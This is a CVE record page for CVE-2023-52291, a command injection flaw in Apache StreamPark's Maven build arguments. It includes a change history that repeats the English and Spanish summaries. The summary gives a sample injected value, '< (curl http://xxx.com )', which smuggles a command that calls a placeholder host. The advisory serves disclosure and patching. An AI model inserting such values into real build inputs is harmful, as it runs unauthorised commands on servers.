CVE-2023-52291

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: In the "Project" module, the maven build args  “<” operator causes command injection. e.g : “< (curl  http://xxx.com )” will be executed as a command injection, Mitigation: all users should upgrade to 2.1.4,  The "<" operator will blocked。
Configurations

Configuration 1 (hide)

cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*

History

21 Nov 2024, 08:39

Type Values Removed Values Added
References () http://www.openwall.com/lists/oss-security/2024/07/17/1 - Mailing List () http://www.openwall.com/lists/oss-security/2024/07/17/1 - Mailing List
References () https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf - Mailing List () https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf - Mailing List

22 Jul 2024, 16:15

Type Values Removed Values Added
Summary (en) In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: In the "Project" module, the maven build args  “<” operator causes command injection. e.g : “< (curl  http://xxx.com )” will be executed as a command injection, Mitigation: all users should upgrade to 2.1.4,  The "<" operator will blocked? (en) In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: In the "Project" module, the maven build args  “<” operator causes command injection. e.g : “< (curl  http://xxx.com )” will be executed as a command injection, Mitigation: all users should upgrade to 2.1.4,  The "<" operator will blocked。

19 Jul 2024, 16:10

Type Values Removed Values Added
CPE cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*
References () http://www.openwall.com/lists/oss-security/2024/07/17/1 - () http://www.openwall.com/lists/oss-security/2024/07/17/1 - Mailing List
References () https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf - () https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf - Mailing List
CVSS v2 : unknown
v3 : unknown
v2 : unknown
v3 : 4.7
Summary
  • (es) En Streampark, el módulo del proyecto integra las capacidades de compilación de Maven. La validación de los parámetros de entrada no es estricta, lo que permite a los atacantes insertar comandos para la ejecución remota de comandos. El requisito previo para un ataque exitoso es que el usuario debe iniciar sesión en el sistema Streampark y tener permisos a nivel de sistema. Generalmente, sólo los usuarios de ese sistema tienen autorización para iniciar sesión y los usuarios no ingresarían manualmente un comando de operación peligroso. Por tanto, el nivel de riesgo de esta vulnerabilidad es muy bajo. Antecedentes: en el módulo "Proyecto", el operador maven build args “&lt;” provoca la inyección de comandos. Por ejemplo: “&lt; (curl http://xxx.com)” se ejecutará como una inyección de comando. Mitigación: todos los usuarios deben actualizar a 2.1.4. El operador "&lt;" se bloqueará.
Summary (en) In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: In the "Project" module, the maven build args  “<” operator causes command injection. e.g : “< (curl  http://xxx.com )” will be executed as a command injection, Mitigation: all users should upgrade to 2.1.4,  The "<" operator will blocked。 (en) In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: In the "Project" module, the maven build args  “<” operator causes command injection. e.g : “< (curl  http://xxx.com )” will be executed as a command injection, Mitigation: all users should upgrade to 2.1.4,  The "<" operator will blocked?
First Time Apache
Apache streampark

17 Jul 2024, 14:15

Type Values Removed Values Added
References
  • () http://www.openwall.com/lists/oss-security/2024/07/17/1 -
Summary (en) In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: In the "Project" module, the maven build args  “<” operator causes command injection. e.g : “< (curl  http://xxx.com )” will be executed as a command injection, Mitigation: all users should upgrade to 2.1.4,  The "<" operator will blocked? (en) In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: In the "Project" module, the maven build args  “<” operator causes command injection. e.g : “< (curl  http://xxx.com )” will be executed as a command injection, Mitigation: all users should upgrade to 2.1.4,  The "<" operator will blocked。

17 Jul 2024, 13:34

Type Values Removed Values Added
Summary (en) In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: In the "Project" module, the maven build args  “<” operator causes command injection. e.g : “< (curl  http://xxx.com )” will be executed as a command injection, Mitigation: all users should upgrade to 2.1.4,  The "<" operator will blocked。 (en) In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: In the "Project" module, the maven build args  “<” operator causes command injection. e.g : “< (curl  http://xxx.com )” will be executed as a command injection, Mitigation: all users should upgrade to 2.1.4,  The "<" operator will blocked?

17 Jul 2024, 09:15

Type Values Removed Values Added
New CVE

Information

Published : 2024-07-17 09:15

Updated : 2024-11-21 08:39


NVD link : CVE-2023-52291

Mitre link : CVE-2023-52291

CVE.ORG link : CVE-2023-52291


JSON object : View

Products Affected

apache

  • streampark
CWE
CWE-77

Improper Neutralization of Special Elements used in a Command ('Command Injection')